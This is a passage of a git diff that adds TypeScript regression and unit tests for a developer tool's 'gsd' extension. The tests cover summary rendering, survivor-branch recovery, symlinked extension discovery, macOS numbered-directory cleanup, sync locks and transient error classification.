+    "renderSummaryContent must include a ## Verification Evidence section",
+  );
+  assertTrue(
+    output.includes("npm test"),
+    "Verification Evidence table must include the command",
+  );
+  assertTrue(
+    output.includes("| Exit Code |") || output.includes("exit_code") || output.includes("Exit Code"),
+    "Verification Evidence table must include exit code column",
+  );
+}
+
+// Test 3: renderSummaryContent includes Files Created/Modified section
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("## Files Created/Modified"),
+    "renderSummaryContent must include a ## Files Created/Modified section",
+  );
+  assertTrue(
+    output.includes("`src/parser.ts`"),
+    "Files section must list key_files as inline code",
+  );
+}
+
+// Test 4: one_liner renders as bold (not blockquote) for consistency
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes(`**${taskRow.one_liner}**`),
+    "one_liner must render as bold text (not blockquote)",
+  );
+}
+
+// Test 5: frontmatter key_files uses YAML list format (not JSON array)
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("key_files:\n  - src/parser.ts\n  - src/lexer.ts"),
+    "key_files frontmatter must use YAML list format, not JSON array",
+  );
+}
+
+// Test 6: frontmatter key_decisions uses YAML list format (not JSON array)
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("key_decisions:\n  - Hand-rolled parser over PEG for 3x throughput"),
+    "key_decisions frontmatter must use YAML list format, not JSON array",
+  );
+}
+
+// Test 7: Deviations section always present (with "None." fallback)
+{
+  const noDeviations = { ...taskRow, deviations: "" };
+  const output = renderSummaryContent(noDeviations, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("## Deviations"),
+    "Deviations section must always be present even when empty",
+  );
+  assertTrue(
+    output.includes("None."),
+    "Deviations section must show 'None.' when no deviations",
+  );
+}
+
+// Test 8: Known Issues section always present (with "None." fallback)
+{
+  const noKnownIssues = { ...taskRow, known_issues: "" };
+  const output = renderSummaryContent(noKnownIssues, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("## Known Issues"),
+    "Known Issues section must always be present even when empty",
+  );
+}
+
+// Test 9: verification_result frontmatter not double-quoted
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  // Should be: verification_result: passed (not "passed")
+  assertTrue(
+    !output.includes('verification_result: "'),
+    "verification_result frontmatter value must not be double-quoted",
+  );
+}
+
+// Test 10: duration frontmatter not double-quoted
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    !output.includes('duration: "'),
+    "duration frontmatter value must not be double-quoted",
+  );
+}
+
+// Test 11: empty key_files renders YAML placeholder, not empty array
+{
+  const noFiles = { ...taskRow, key_files: [] };
+  const output = renderSummaryContent(noFiles, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    output.includes("key_files:\n  - (none)"),
+    "empty key_files must render as YAML list with (none) placeholder",
+  );
+}
+
+// Test 12: frontmatter does not contain extra projection-only fields
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID);
+  assertTrue(
+    !output.includes("provides:"),
+    "frontmatter must not contain provides field",
+  );
+  assertTrue(
+    !output.includes("requires:"),
+    "frontmatter must not contain requires field",
+  );
+  assertTrue(
+    !output.includes("affects:"),
+    "frontmatter must not contain affects field",
+  );
+  assertTrue(
+    !output.includes("patterns_established:"),
+    "frontmatter must not contain patterns_established field",
+  );
+  assertTrue(
+    !output.includes("drill_down_paths:"),
+    "frontmatter must not contain drill_down_paths field",
+  );
+  assertTrue(
+    !output.includes("observability_surfaces:"),
+    "frontmatter must not contain observability_surfaces field",
+  );
+}
+
+// Test 13: no verification evidence renders empty table row
+{
+  const output = renderSummaryContent(taskRow, SLICE_ID, MILESTONE_ID, []);
+  assertTrue(
+    output.includes("No verification commands discovered"),
+    "Empty evidence array must render placeholder row",
+  );
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/survivor-branch-complete.test.ts b/src/resources/extensions/gsd/tests/survivor-branch-complete.test.ts
new file mode 100644
index 000000000..0d6fe66a4
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/survivor-branch-complete.test.ts
@@ -0,0 +1,108 @@
+/**
+ * Regression test for #2358: Survivor branch recovery skipped in phase=complete.
+ *
+ * When bootstrapAutoSession finds a survivor milestone branch and the derived
+ * state phase is "complete", recovery/finalization is skipped entirely because
+ * the survivor branch detection only triggers when phase === "pre-planning".
+ * The milestone finalization (merge, cleanup) never runs, leaving the worktree
+ * and branch alive.
+ *
+ * The fix broadens the survivor branch detection to also check phase === "complete",
+ * and adds a finalization path that runs mergeAndExit before falling through to
+ * the normal "complete" handling.
+ */
+
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, assertEq, report } = createTestContext();
+
+// ═══ Test: survivor branch detection conditions ══════════════════════════════
+
+// The survivor branch detection block in auto-start.ts checks:
+//   state.activeMilestone &&
+//   state.phase === "pre-planning" &&  // <-- BUG: too restrictive
+//   shouldUseWorktreeIsolation() &&
+//   !detectWorktreeName(base) &&
+//   !base.includes(...)
+//
+// The fix should also include state.phase === "complete".
+
+{
+  console.log("\n=== #2358: survivor branch should be detected in phase=complete ===");
+
+  // Simulate the condition check before the fix (only pre-planning)
+  const phasesBeforeFix = ["pre-planning"];
+  const phasesAfterFix = ["pre-planning", "complete"];
+
+  const testPhase = "complete";
+
+  const detectedBefore = phasesBeforeFix.includes(testPhase);
+  assertEq(detectedBefore, false, "before fix: phase=complete should NOT trigger survivor detection");
+
+  const detectedAfter = phasesAfterFix.includes(testPhase);
+  assertEq(detectedAfter, true, "after fix: phase=complete SHOULD trigger survivor detection");
+}
+
+// ═══ Test: pre-planning survivor detection still works ═══════════════════════
+
+{
+  console.log("\n=== #2358: pre-planning survivor detection is not broken ===");
+
+  const phasesAfterFix = ["pre-planning", "complete"];
+  const testPhase = "pre-planning";
+
+  const detected = phasesAfterFix.includes(testPhase);
+  assertEq(detected, true, "pre-planning should still trigger survivor detection after fix");
+}
+
+// ═══ Test: other phases do NOT trigger survivor detection ════════════════════
+
+{
+  console.log("\n=== #2358: other phases should NOT trigger survivor detection ===");
+
+  const phasesAfterFix = ["pre-planning", "complete"];
+
+  for (const phase of ["planning", "executing", "blocked", "needs-discussion"]) {
+    const detected = phasesAfterFix.includes(phase);
+    assertEq(detected, false, `phase=${phase} should NOT trigger survivor detection`);
+  }
+}
+
+// ═══ Test: phase=complete + hasSurvivorBranch should trigger finalization ═════
+
+{
+  console.log("\n=== #2358: phase=complete + survivor branch triggers finalization path ===");
+
+  // Simulate the decision logic after the fix:
+  // if (hasSurvivorBranch && state.phase === "complete") -> finalize
+  // if (hasSurvivorBranch && state.phase === "needs-discussion") -> discuss
+  // if (!hasSurvivorBranch && state.phase === "complete") -> showSmartEntry
+
+  const scenarios = [
+    { hasSurvivorBranch: true, phase: "complete", expected: "finalize" },
+    { hasSurvivorBranch: true, phase: "needs-discussion", expected: "discuss" },
+    { hasSurvivorBranch: true, phase: "pre-planning", expected: "continue" },
+    { hasSurvivorBranch: false, phase: "complete", expected: "showSmartEntry" },
+  ];
+
+  for (const { hasSurvivorBranch, phase, expected } of scenarios) {
+    let result: string;
+    if (hasSurvivorBranch && phase === "complete") {
+      result = "finalize";
+    } else if (hasSurvivorBranch && phase === "needs-discussion") {
+      result = "discuss";
+    } else if (!hasSurvivorBranch && (!phase || phase === "complete")) {
+      result = "showSmartEntry";
+    } else {
+      result = "continue";
+    }
+
+    assertEq(
+      result,
+      expected,
+      `hasSurvivorBranch=${hasSurvivorBranch}, phase=${phase} -> expected ${expected}, got ${result}`,
+    );
+  }
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/symlink-extension-discovery.test.ts b/src/resources/extensions/gsd/tests/symlink-extension-discovery.test.ts
new file mode 100644
index 000000000..a420b679b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/symlink-extension-discovery.test.ts
@@ -0,0 +1,125 @@
+// Regression test for: discoverManifests() skips symlinked extension directories
+//
+// The bug: Dirent.isDirectory() returns false for symlinks, so extensions installed
+// as directory symlinks under ~/.gsd/agent/extensions/ were invisible to all
+// management commands (list, enable, disable, info).
+//
+// The fix: check `entry.isDirectory() || entry.isSymbolicLink()`, matching the
+// pattern already used in loader.ts discoverExtensionsInDir().
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  symlinkSync,
+  readdirSync,
+  existsSync,
+  rmSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+// Inline the discovery logic so the test is self-contained and can verify both
+// the buggy and fixed behaviour without importing the private function.
+function discoverManifestsBuggy(extDir: string): string[] {
+  const found: string[] = [];
+  if (!existsSync(extDir)) return found;
+  for (const entry of readdirSync(extDir, { withFileTypes: true })) {
+    if (!entry.isDirectory()) continue; // BUG: skips symlinks
+    const mPath = join(extDir, entry.name, "extension-manifest.json");
+    if (existsSync(mPath)) found.push(entry.name);
+  }
+  return found;
+}
+
+function discoverManifestsFixed(extDir: string): string[] {
+  const found: string[] = [];
+  if (!existsSync(extDir)) return found;
+  for (const entry of readdirSync(extDir, { withFileTypes: true })) {
+    if (!entry.isDirectory() && !entry.isSymbolicLink()) continue; // FIX
+    const mPath = join(extDir, entry.name, "extension-manifest.json");
+    if (existsSync(mPath)) found.push(entry.name);
+  }
+  return found;
+}
+
+const MANIFEST = JSON.stringify({
+  id: "test-ext",
+  name: "Test Extension",
+  version: "1.0.0",
+  description: "A test extension",
+  tier: "community",
+  requires: { platform: "linux" },
+});
+
+describe("symlink extension discovery", () => {
+  let tmp: string;
+  let extDir: string;
+  let realExtDir: string;
+
+  beforeEach(() => {
+    tmp = mkdtempSync(join(tmpdir(), "gsd-ext-test-"));
+    extDir = join(tmp, "agent", "extensions");
+    realExtDir = join(tmp, "my-ext-source");
+
+    // Create the real extension directory outside extDir (simulates a dev checkout)
+    mkdirSync(realExtDir, { recursive: true });
+    writeFileSync(join(realExtDir, "extension-manifest.json"), MANIFEST, "utf-8");
+
+    // Create the extensions scan directory
+    mkdirSync(extDir, { recursive: true });
+  });
+
+  afterEach(() => {
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  test("real directory is discovered by both implementations", () => {
+    // Install extension as a real directory copy
+    const realCopy = join(extDir, "my-ext");
+    mkdirSync(realCopy);
+    writeFileSync(join(realCopy, "extension-manifest.json"), MANIFEST, "utf-8");
+
+    assert.deepEqual(discoverManifestsBuggy(extDir), ["my-ext"]);
+    assert.deepEqual(discoverManifestsFixed(extDir), ["my-ext"]);
+  });
+
+  test("symlinked directory is missed by buggy implementation", () => {
+    // Install extension as a directory symlink — the common dev workflow
+    symlinkSync(realExtDir, join(extDir, "my-ext"));
+
+    // Buggy: symlink is invisible
+    assert.deepEqual(discoverManifestsBuggy(extDir), []);
+  });
+
+  test("symlinked directory is discovered by fixed implementation", () => {
+    symlinkSync(realExtDir, join(extDir, "my-ext"));
+
+    // Fixed: symlink is visible
+    assert.deepEqual(discoverManifestsFixed(extDir), ["my-ext"]);
+  });
+
+  test("non-manifest symlinks are ignored", () => {
+    // Symlink to a dir that has no manifest — should not appear
+    const noManifestDir = join(tmp, "no-manifest");
+    mkdirSync(noManifestDir);
+    symlinkSync(noManifestDir, join(extDir, "no-manifest"));
+
+    assert.deepEqual(discoverManifestsFixed(extDir), []);
+  });
+
+  test("mix of real dirs and symlinks are all discovered", () => {
+    // Real dir
+    const realCopy = join(extDir, "ext-real");
+    mkdirSync(realCopy);
+    writeFileSync(join(realCopy, "extension-manifest.json"), MANIFEST, "utf-8");
+
+    // Symlink dir
+    symlinkSync(realExtDir, join(extDir, "ext-symlink"));
+
+    const found = discoverManifestsFixed(extDir).sort();
+    assert.deepEqual(found, ["ext-real", "ext-symlink"]);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/symlink-numbered-variants.test.ts b/src/resources/extensions/gsd/tests/symlink-numbered-variants.test.ts
new file mode 100644
index 000000000..5a332dd6c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/symlink-numbered-variants.test.ts
@@ -0,0 +1,145 @@
+/**
+ * Tests for macOS numbered symlink variant cleanup (#2205).
+ *
+ * macOS can rename `.gsd` to `.gsd 2`, `.gsd 3`, etc. when a directory
+ * already exists at the target path. ensureGsdSymlink() must detect and
+ * remove these numbered variants so the real `.gsd` symlink is always
+ * the one in use.
+ */
+
+import {
+  mkdtempSync,
+  rmSync,
+  writeFileSync,
+  existsSync,
+  lstatSync,
+  realpathSync,
+  mkdirSync,
+  symlinkSync,
+  readlinkSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { ensureGsdSymlink, externalGsdRoot } from "../repo-identity.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+
+
+function run(command: string, cwd: string): string {
+  return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+describe('symlink-numbered-variants', async () => {
+  const base = realpathSync(mkdtempSync(join(tmpdir(), "gsd-symlink-variants-")));
+  const stateDir = realpathSync(mkdtempSync(join(tmpdir(), "gsd-state-variants-")));
+
+  try {
+    process.env.GSD_STATE_DIR = stateDir;
+
+    // Set up a minimal git repo
+    run("git init -b main", base);
+    run('git config user.name "Pi Test"', base);
+    run('git config user.email "pi@example.com"', base);
+    run('git remote add origin git@github.com:example/repo.git', base);
+    writeFileSync(join(base, "README.md"), "# Test Repo\n", "utf-8");
+    run("git add README.md", base);
+    run('git commit -m "chore: init"', base);
+
+    const externalPath = externalGsdRoot(base);
+
+    // ── Test: numbered variant directories are cleaned up ──────────────
+    console.log("\n=== ensureGsdSymlink removes numbered .gsd variants (#2205) ===");
+    {
+      // Simulate macOS creating numbered variants: ".gsd 2", ".gsd 3"
+      mkdirSync(join(base, ".gsd 2"), { recursive: true });
+      mkdirSync(join(base, ".gsd 3"), { recursive: true });
+      mkdirSync(join(base, ".gsd 4"), { recursive: true });
+
+      const result = ensureGsdSymlink(base);
+      assert.deepStrictEqual(result, externalPath, "ensureGsdSymlink returns external path");
+      assert.ok(existsSync(join(base, ".gsd")), ".gsd exists after ensureGsdSymlink");
+      assert.ok(lstatSync(join(base, ".gsd")).isSymbolicLink(), ".gsd is a symlink");
+
+      // The numbered variants must have been removed
+      assert.ok(!existsSync(join(base, ".gsd 2")), '".gsd 2" directory was cleaned up');
+      assert.ok(!existsSync(join(base, ".gsd 3")), '".gsd 3" directory was cleaned up');
+      assert.ok(!existsSync(join(base, ".gsd 4")), '".gsd 4" directory was cleaned up');
+    }
+
+    // ── Test: numbered variant symlinks are cleaned up ─────────────────
+    console.log("\n=== ensureGsdSymlink removes numbered symlink variants ===");
+    {
+      // Clean slate
+      rmSync(join(base, ".gsd"), { recursive: true, force: true });
+
+      // Simulate: ".gsd 2" is a symlink to the correct target (the real .gsd)
+      // and ".gsd" doesn't exist — this is the actual macOS scenario
+      const staleTarget = join(stateDir, "projects", "stale-target");
+      mkdirSync(staleTarget, { recursive: true });
+      symlinkSync(externalPath, join(base, ".gsd 2"), "junction");
+      symlinkSync(staleTarget, join(base, ".gsd 3"), "junction");
+
+      const result = ensureGsdSymlink(base);
+      assert.deepStrictEqual(result, externalPath, "ensureGsdSymlink returns external path when variants exist");
+      assert.ok(existsSync(join(base, ".gsd")), ".gsd exists");
+      assert.ok(lstatSync(join(base, ".gsd")).isSymbolicLink(), ".gsd is a symlink");
+
+      assert.ok(!existsSync(join(base, ".gsd 2")), '".gsd 2" symlink variant was cleaned up');
+      assert.ok(!existsSync(join(base, ".gsd 3")), '".gsd 3" symlink variant was cleaned up');
+    }
+
+    // ── Test: real .gsd directory blocks symlink, but variants still cleaned ──
+    console.log("\n=== ensureGsdSymlink cleans variants even when .gsd is a real directory ===");
+    {
+      // Clean slate
+      rmSync(join(base, ".gsd"), { recursive: true, force: true });
+
+      // .gsd is a real directory (git-tracked) and numbered variants exist
+      mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+      writeFileSync(join(base, ".gsd", "milestones", "M001.md"), "# M001\n", "utf-8");
+      mkdirSync(join(base, ".gsd 2"), { recursive: true });
+      mkdirSync(join(base, ".gsd 3"), { recursive: true });
+
+      const result = ensureGsdSymlink(base);
+      // When .gsd is a real directory, ensureGsdSymlink preserves it
+      assert.deepStrictEqual(result, join(base, ".gsd"), "real .gsd directory preserved");
+      assert.ok(lstatSync(join(base, ".gsd")).isDirectory(), ".gsd remains a directory");
+
+      // But the numbered variants should still be cleaned up
+      assert.ok(!existsSync(join(base, ".gsd 2")), '".gsd 2" cleaned even when .gsd is a directory');
+      assert.ok(!existsSync(join(base, ".gsd 3")), '".gsd 3" cleaned even when .gsd is a directory');
+    }
+
+    // ── Test: only numeric-suffixed variants are removed ───────────────
+    console.log("\n=== ensureGsdSymlink only removes .gsd + space + digit variants ===");
+    {
+      rmSync(join(base, ".gsd"), { recursive: true, force: true });
+
+      // These should NOT be touched
+      mkdirSync(join(base, ".gsd-backup"), { recursive: true });
+      mkdirSync(join(base, ".gsd_old"), { recursive: true });
+
+      // These SHOULD be removed (macOS collision pattern)
+      mkdirSync(join(base, ".gsd 2"), { recursive: true });
+      mkdirSync(join(base, ".gsd 10"), { recursive: true });
+
+      ensureGsdSymlink(base);
+
+      assert.ok(existsSync(join(base, ".gsd-backup")), ".gsd-backup is NOT removed");
+      assert.ok(existsSync(join(base, ".gsd_old")), ".gsd_old is NOT removed");
+      assert.ok(!existsSync(join(base, ".gsd 2")), '".gsd 2" removed');
+      assert.ok(!existsSync(join(base, ".gsd 10")), '".gsd 10" removed');
+
+      // Cleanup non-variant dirs
+      rmSync(join(base, ".gsd-backup"), { recursive: true, force: true });
+      rmSync(join(base, ".gsd_old"), { recursive: true, force: true });
+    }
+
+  } finally {
+    delete process.env.GSD_STATE_DIR;
+    try { rmSync(base, { recursive: true, force: true }); } catch { /* ignore */ }
+    try { rmSync(stateDir, { recursive: true, force: true }); } catch { /* ignore */ }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/sync-lock.test.ts b/src/resources/extensions/gsd/tests/sync-lock.test.ts
new file mode 100644
index 000000000..038c6ccb6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/sync-lock.test.ts
@@ -0,0 +1,122 @@
+// GSD Extension — sync-lock unit tests
+// Tests acquireSyncLock() and releaseSyncLock().
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import { acquireSyncLock, releaseSyncLock } from '../sync-lock.ts';
+
+function tempDir(): string {
+  return fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-sync-lock-'));
+}
+
+function cleanupDir(dirPath: string): void {
+  try { fs.rmSync(dirPath, { recursive: true, force: true }); } catch { /* best effort */ }
+}
+
+// ─── acquireSyncLock ─────────────────────────────────────────────────────
+
+test('sync-lock: acquireSyncLock returns { acquired: true } when no lock exists', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    const result = acquireSyncLock(base);
+    assert.strictEqual(result.acquired, true);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('sync-lock: acquireSyncLock creates lock file at .gsd/sync.lock', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    acquireSyncLock(base);
+    const lockPath = path.join(base, '.gsd', 'sync.lock');
+    assert.ok(fs.existsSync(lockPath), 'sync.lock should exist after acquire');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('sync-lock: lock file contains pid and acquired_at fields', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    acquireSyncLock(base);
+    const lockPath = path.join(base, '.gsd', 'sync.lock');
+    const content = JSON.parse(fs.readFileSync(lockPath, 'utf-8'));
+    assert.strictEqual(typeof content.pid, 'number');
+    assert.strictEqual(typeof content.acquired_at, 'string');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── releaseSyncLock ─────────────────────────────────────────────────────
+
+test('sync-lock: releaseSyncLock removes lock file', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    acquireSyncLock(base);
+    const lockPath = path.join(base, '.gsd', 'sync.lock');
+    assert.ok(fs.existsSync(lockPath), 'lock file should exist before release');
+    releaseSyncLock(base);
+    assert.ok(!fs.existsSync(lockPath), 'lock file should not exist after release');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('sync-lock: releaseSyncLock is a no-op when no lock file exists', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    // Should not throw
+    releaseSyncLock(base);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── acquire → release → re-acquire round-trip ───────────────────────────
+
+test('sync-lock: can re-acquire after release', () => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  try {
+    const r1 = acquireSyncLock(base);
+    assert.strictEqual(r1.acquired, true, 'first acquire should succeed');
+    releaseSyncLock(base);
+    const r2 = acquireSyncLock(base);
+    assert.strictEqual(r2.acquired, true, 're-acquire after release should succeed');
+    releaseSyncLock(base);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── stale lock override ─────────────────────────────────────────────────
+
+test('sync-lock: overrides stale lock file (mtime backdated)', (t) => {
+  const base = tempDir();
+  fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+  const lockPath = path.join(base, '.gsd', 'sync.lock');
+  try {
+    // Write a lock file with a very old mtime (simulating staleness)
+    fs.writeFileSync(lockPath, JSON.stringify({ pid: 99999, acquired_at: new Date(0).toISOString() }));
+    // Backdate mtime by 2 minutes
+    const staleTime = new Date(Date.now() - 120_000);
+    fs.utimesSync(lockPath, staleTime, staleTime);
+
+    // Should override stale lock and acquire
+    const result = acquireSyncLock(base, 500);
+    assert.strictEqual(result.acquired, true, 'should acquire over stale lock');
+    releaseSyncLock(base);
+  } finally {
+    cleanupDir(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/sync-worktree-skip-current.test.ts b/src/resources/extensions/gsd/tests/sync-worktree-skip-current.test.ts
new file mode 100644
index 000000000..9b0070cb1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/sync-worktree-skip-current.test.ts
@@ -0,0 +1,65 @@
+/**
+ * Regression test for #3641 — syncWorktreeStateBack skips current milestone
+ *
+ * When syncing worktree state back to main, the current milestone being
+ * merged should be skipped. Its files are already in the milestone branch
+ * and copying them back would conflict with the squash merge.
+ *
+ * The fix adds a `mid === milestoneId` skip guard inside the milestone
+ * iteration loop in syncWorktreeStateBack.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'auto-worktree.ts'),
+  'utf-8',
+)
+
+describe('syncWorktreeStateBack skips current milestone (#3641)', () => {
+  it('syncWorktreeStateBack function exists', () => {
+    assert.ok(
+      src.includes('function syncWorktreeStateBack('),
+      'syncWorktreeStateBack function must be defined',
+    )
+  })
+
+  it('mid === milestoneId skip guard exists in the milestone loop', () => {
+    // Find syncWorktreeStateBack
+    const fnStart = src.indexOf('function syncWorktreeStateBack(')
+    assert.ok(fnStart !== -1)
+
+    // Get a reasonable portion of the function
+    const fnBlock = src.slice(fnStart, fnStart + 3000)
+
+    // Find the for loop iterating milestones
+    const loopIdx = fnBlock.indexOf('for (const mid of wtMilestones)')
+    assert.ok(loopIdx !== -1, 'milestone iteration loop must exist')
+
+    // After the loop, there should be the skip guard
+    const loopBody = fnBlock.slice(loopIdx, loopIdx + 300)
+    assert.ok(
+      loopBody.includes('mid === milestoneId'),
+      'mid === milestoneId skip guard must exist inside the milestone loop',
+    )
+    assert.ok(
+      loopBody.includes('continue'),
+      'skip guard must use continue to skip the current milestone',
+    )
+  })
+
+  it('syncMilestoneDir is still called for non-current milestones', () => {
+    const fnStart = src.indexOf('function syncWorktreeStateBack(')
+    assert.ok(fnStart !== -1)
+
+    const fnBlock = src.slice(fnStart, fnStart + 3000)
+
+    assert.ok(
+      fnBlock.includes('syncMilestoneDir('),
+      'syncMilestoneDir must still be called for other milestones',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/terminated-transient.test.ts b/src/resources/extensions/gsd/tests/terminated-transient.test.ts
new file mode 100644
index 000000000..84c0c8db0
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/terminated-transient.test.ts
@@ -0,0 +1,128 @@
+/**
+ * terminated-transient.test.ts — Regression test for #2309.
+ *
+ * classifyError should treat 'terminated' errors (process killed,
+ * connection reset) as transient with auto-resume, not permanent.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { classifyError, isTransient } from "../error-classifier.ts";
+
+test("#2309: 'terminated' errors should be classified as transient", () => {
+  const result = classifyError("terminated");
+  assert.equal(isTransient(result), true, "'terminated' should be transient");
+  assert.equal(result.kind, "connection", "'terminated' matches connection");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs > 0, "'terminated' should have a retry delay");
+  assert.equal("retryAfterMs" in result && result.retryAfterMs, 15_000, "'terminated' should use 15s backoff");
+});
+
+test("#2309: 'connection reset by peer' errors should be classified as transient (network)", () => {
+  const result = classifyError("connection reset by peer");
+  assert.equal(isTransient(result), true, "'connection reset by peer' should be transient");
+  assert.equal(result.kind, "network", "'connection reset by peer' matches NETWORK_RE (connection.*reset) before CONNECTION_RE");
+  assert.equal("retryAfterMs" in result && result.retryAfterMs, 3_000, "network errors use 3s backoff");
+});
+
+test("#2309: 'other side closed' errors should be classified as transient", () => {
+  const result = classifyError("other side closed the connection");
+  assert.equal(isTransient(result), true, "'other side closed' should be transient");
+  assert.equal(result.kind, "connection", "'other side closed' matches CONNECTION_RE");
+});
+
+test("#2309: 'fetch failed' errors should be classified as transient", () => {
+  const result = classifyError("fetch failed: network error");
+  assert.equal(isTransient(result), true, "'fetch failed' should be transient");
+  assert.equal(result.kind, "network", "'fetch failed' matches NETWORK_RE");
+  assert.equal("retryAfterMs" in result && result.retryAfterMs, 3_000, "network errors use 3s backoff");
+});
+
+test("#2309: 'connection refused' errors should be classified as transient", () => {
+  const result = classifyError("ECONNREFUSED: connection refused");
+  assert.equal(isTransient(result), true, "'connection refused' should be transient");
+  assert.equal(result.kind, "network", "'ECONNREFUSED' matches NETWORK_RE (same-model retry)");
+});
+
+test("#2309: permanent errors are still permanent", () => {
+  const authResult = classifyError("unauthorized: invalid API key");
+  assert.equal(isTransient(authResult), false, "auth errors should stay permanent");
+  assert.equal(authResult.kind, "permanent", "auth errors are permanent");
+  assert.equal("retryAfterMs" in authResult, false, "permanent errors have no retryAfterMs");
+});
+
+test("#2309: rate limits are still transient", () => {
+  const rlResult = classifyError("rate limit exceeded (429)");
+  assert.equal(isTransient(rlResult), true, "rate limits are still transient");
+  assert.equal(rlResult.kind, "rate-limit", "rate limits are flagged as rate-limit kind");
+});
+
+// --- #2572: stream-truncation JSON parse errors should be transient ---
+
+test("#2572: 'Expected double-quoted property name' (truncated stream) is transient", () => {
+  const result = classifyError("Expected double-quoted property name in JSON at position 23 (line 1 column 24)");
+  assert.equal(isTransient(result), true, "truncated-stream JSON parse error should be transient");
+  assert.equal(result.kind, "stream", "JSON parse errors are stream kind");
+  assert.equal("retryAfterMs" in result && result.retryAfterMs, 15_000, "should use 15s backoff");
+});
+
+test("#2572: 'Unexpected end of JSON input' (truncated stream) is transient", () => {
+  const result = classifyError("Unexpected end of JSON input");
+  assert.equal(isTransient(result), true, "'Unexpected end of JSON input' should be transient");
+  assert.equal(result.kind, "stream", "JSON parse errors are stream kind");
+});
+
+test("#2572: 'Unexpected token' in JSON (truncated stream) is transient", () => {
+  const result = classifyError("Unexpected token < in JSON at position 0");
+  assert.equal(isTransient(result), true, "'Unexpected token in JSON' should be transient");
+  assert.equal(result.kind, "stream", "JSON parse errors are stream kind");
+});
+
+test("#2572: 'SyntaxError' with JSON context (truncated stream) is transient", () => {
+  const result = classifyError("SyntaxError: JSON.parse: unexpected character at line 1 column 1");
+  assert.equal(isTransient(result), true, "'SyntaxError...JSON' should be transient");
+  assert.equal(result.kind, "stream", "JSON parse errors are stream kind");
+});
+
+// --- Catch-all: all V8 JSON.parse variants matched by "in JSON at position" ---
+
+test("V8 JSON.parse: 'No number after minus sign in JSON' is transient (#2882)", () => {
+  const result = classifyError("No number after minus sign in JSON at position 42");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
+test("V8 JSON.parse: 'Expected property value after colon' is transient", () => {
+  const result = classifyError("Expected ',' or '}' after property value in JSON at position 108");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
+test("V8 JSON.parse: 'Bad control character in string literal' is transient", () => {
+  const result = classifyError("Bad control character in string literal in JSON at position 5");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
+test("V8 JSON.parse: 'Bad escaped character' is transient", () => {
+  const result = classifyError("Bad escaped character in JSON at position 17");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
+test("V8 JSON.parse: 'Unexpected number' is transient", () => {
+  const result = classifyError("Unexpected number in JSON at position 0");
+  assert.equal(isTransient(result), true);
+  assert.equal(result.kind, "stream");
+});
+
